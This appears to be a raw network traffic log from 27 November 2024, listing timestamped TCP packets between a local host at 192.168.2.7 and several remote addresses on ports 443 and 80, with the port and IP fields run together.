                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.725541115 CET4434975613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.728601933 CET8049706185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.728754997 CET8049755185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.728986025 CET4975580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.729180098 CET4975580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.733072996 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.734270096 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.734278917 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.736388922 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.736393929 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.747279882 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.747735023 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.747754097 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.748169899 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.748177052 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.811499119 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.812191963 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.812215090 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.812649012 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.812659979 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.849087954 CET8049755185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.859514952 CET49732443192.168.2.7172.202.163.200
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.859548092 CET44349732172.202.163.200192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.859564066 CET49732443192.168.2.7172.202.163.200
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:27.859571934 CET44349732172.202.163.200192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.057998896 CET4434975023.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.058079958 CET49750443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.060889959 CET49750443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.060900927 CET4434975023.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.061151981 CET4434975023.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.101876020 CET49750443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.104998112 CET49750443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.151333094 CET4434975023.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.188674927 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.188756943 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.188834906 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.189079046 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.189101934 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.189129114 CET49747443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.189135075 CET4434974713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.191740036 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.191792965 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.191863060 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.192079067 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.192121983 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.192446947 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.192470074 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.192483902 CET49746443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.192492008 CET4434974613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.192496061 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.192635059 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.192646027 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.194649935 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.194678068 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.194803953 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.194912910 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.194924116 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.254319906 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.254379034 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.254453897 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.272735119 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.272735119 CET49748443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.272773981 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.272789001 CET4434974813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.278543949 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.278575897 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.278656006 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.278928041 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.278939962 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.589406967 CET4434975023.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.589530945 CET4434975023.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.589587927 CET49750443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.598490000 CET49750443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.598514080 CET4434975023.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.620243073 CET49761443192.168.2.7172.217.17.78
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.620277882 CET44349761172.217.17.78192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.620369911 CET49761443192.168.2.7172.217.17.78
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.620671988 CET49761443192.168.2.7172.217.17.78
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.620688915 CET44349761172.217.17.78192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.647200108 CET49762443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.647228003 CET4434976223.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.647341967 CET49762443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.647595882 CET49762443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.647605896 CET4434976223.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.099946976 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.143959999 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.165848017 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.187988997 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.187999010 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.189518929 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.189523935 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.553852081 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.553922892 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.554006100 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.618483067 CET8049755185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.619277000 CET4975580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.763664007 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.763693094 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.763715982 CET49752443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.763724089 CET4434975213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.768465996 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.768503904 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.768604040 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.768940926 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.768954992 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.971596003 CET4975580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.972829103 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.974383116 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.976911068 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.976933002 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.979412079 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.979418039 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.979935884 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.979953051 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.016885996 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.016895056 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.060121059 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.060779095 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.060807943 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.061418056 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.061424017 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.071661949 CET4434976223.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.071728945 CET49762443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.073548079 CET49762443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.073554993 CET4434976223.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.073790073 CET4434976223.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.076956034 CET49762443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.093503952 CET8049755185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.123336077 CET4434976223.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.364860058 CET44349761172.217.17.78192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.384888887 CET49761443192.168.2.7172.217.17.78
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.387993097 CET49745443192.168.2.7142.250.181.68
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.418661118 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.418723106 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.418766975 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.418926001 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.418940067 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.418950081 CET49758443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.418956995 CET4434975813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.419363976 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.419439077 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.419480085 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.419727087 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.419744968 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.419754982 CET49757443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.419760942 CET4434975713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.421888113 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.421924114 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.421983957 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.422249079 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.422261953 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.422380924 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.422426939 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.422478914 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.422591925 CET49765443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.422607899 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.504262924 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.504349947 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.504403114 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.504784107 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.504803896 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.504816055 CET49759443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.504822016 CET4434975913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.512928963 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.512978077 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.513156891 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.513335943 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.513353109 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.599658966 CET4434976223.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.599731922 CET4434976223.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.599781036 CET49762443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.600573063 CET49762443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.600584984 CET4434976223.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.600596905 CET49762443192.168.2.723.218.208.109
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.600601912 CET4434976223.218.208.109192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.920258045 CET8049755185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:30.920305967 CET4975580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.425345898 CET4434975613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.427700996 CET49756443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.427721977 CET4434975613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.429435015 CET49756443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.429450989 CET4434975613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.547873974 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.548902035 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.548914909 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.549341917 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.549346924 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.859302998 CET4434975613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.859375954 CET4434975613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.861151934 CET49756443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.867213964 CET49756443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.867213964 CET49756443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.867232084 CET4434975613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.867235899 CET4434975613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.886953115 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.886984110 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.887767076 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.895153046 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.895169020 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.992352009 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.992424011 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.992525101 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.992763042 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.992780924 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.992810965 CET49763443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.992816925 CET4434976313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.995742083 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.995784998 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.996083021 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.998186111 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:31.998199940 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.204607010 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.246994019 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.266875029 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.266896009 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.267489910 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.267496109 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.294296980 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.344315052 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.344326973 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.344666004 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.344671011 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.653445959 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.653637886 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.653723955 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.741976023 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.741976023 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.742005110 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.742017031 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.763704062 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.763783932 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:32.764049053 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:33.678009987 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:33.713483095 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:33.758723021 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:33.883327007 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:33.884118080 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.298567057 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.298597097 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.301886082 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.301889896 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.371975899 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.372029066 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.372046947 CET49766443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.372064114 CET4434976613.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.426307917 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.426331997 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.427086115 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.427093029 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.525208950 CET4434976513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.617556095 CET4434976813.107.246.63192.168.2.7
